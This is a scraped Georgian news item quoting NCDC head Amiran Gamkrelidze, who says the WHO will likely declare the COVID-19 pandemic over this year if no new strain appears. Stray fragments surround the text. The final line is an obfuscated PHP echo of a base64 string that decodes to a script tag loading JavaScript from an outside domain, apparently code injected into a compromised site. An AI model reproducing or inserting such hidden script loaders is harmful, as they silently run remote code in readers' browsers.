celsiusi
ავერსი საქკაბელი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის თქმით, თუ ახალი შტამი არ გამოიკვეთება, მაშინ ჯანმო დიდი ალბათობით წელს პანდემიას დასრულებულად გამოაცხადებს.
 
"დღეს პირველი დღეს 2020 წლის სექტემბრის შემდეგ, როდესაც ჩვენ ნულოვანი მაჩვენებელი გვაქვს. რა თქმა უნდა ეს ძალიან მნიშვნელოვანია. ასევე ყველა პროგნოზით, რასაც საერთაშორისო სხვადასხვა დიდი ინსტიტუციებით აკეთებენ და მათ შორის ჩვენს ქვეყანასთან მიმართებაშიც და მათ საფუძველზე ასევე ჩვენც ვაკეთებთ პროგნოზირებას. ეს სტაბილიზაცია უნდა გაგრძელდეს აპრილში გარკვეული შესაძლებელია მცირე პუნქტუაციებით.
 
არ გამოცხადებულა დასრულებულად პანდემია ჯანმრთელობის მსოფლიო ორგანიზაციის მიერ, მაგრამ მისი მწვავე ფაზა სწორედ ამ მწვავე დოკუმენტშია. მათ თქვეს, რომ პანდემიის მწვავე ფაზა სრულდება, ანუ დიდი ალბათობით, კიდევ ერთხელ ხაზს ვუსვამ, თუ რამე ექსტრაორდინალური არ მოხდა ამ ვირუსის ბიოლოგიაში და ევოლუციაში, დიდი ალბათობით წელს ჯანმო პანდემიას დასრულებულად გამოაცხადებს," - განაცხადა დაავადებათა კონტროლის ცენტრის გენერალურმა დირექტორმა ამირან გამყრელიძემ.
780
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");